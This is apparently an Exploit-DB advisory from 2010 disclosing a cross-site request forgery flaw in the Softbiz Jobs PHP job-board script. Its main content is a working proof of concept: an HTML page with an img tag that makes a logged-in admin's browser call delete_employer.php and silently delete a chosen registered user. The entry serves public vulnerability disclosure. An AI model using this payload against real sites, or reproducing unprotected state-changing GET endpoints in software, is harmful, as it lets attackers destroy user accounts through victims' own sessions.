Softbiz Jobs - Cross-Site Request Forgery

EDB-ID:

11543

CVE:

EDB Verified:

Author:

pratul agrawal

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-02-23

Vulnerable App:

                     =======================================================================
 
                                         Softbiz Jobs CSRF Vulnerability
                     =======================================================================
 
                                                     by
 
                                               Pratul Agrawal
 
 
# Vulnerability found in- Admin module
 
# email         Pratulag@yahoo.com
 
# company       aksitservices
 
# Credit by     Pratul Agrawal

# Download      http://www.softbizscripts.com/

# Script        softbizscripts

 
 
# Proof of concept

Script to delete the registered user through Cross Site request forgery

             ...................................................................................................................

                        <html>

                          <body>

                              <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] /> 

                          </body>

                        </html>


             ...................................................................................................................



After execution refresh teh page and u can see that user having id=20 get deleted automatically.

 
#If you have any questions, comments, or concerns, feel free to contact me.

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services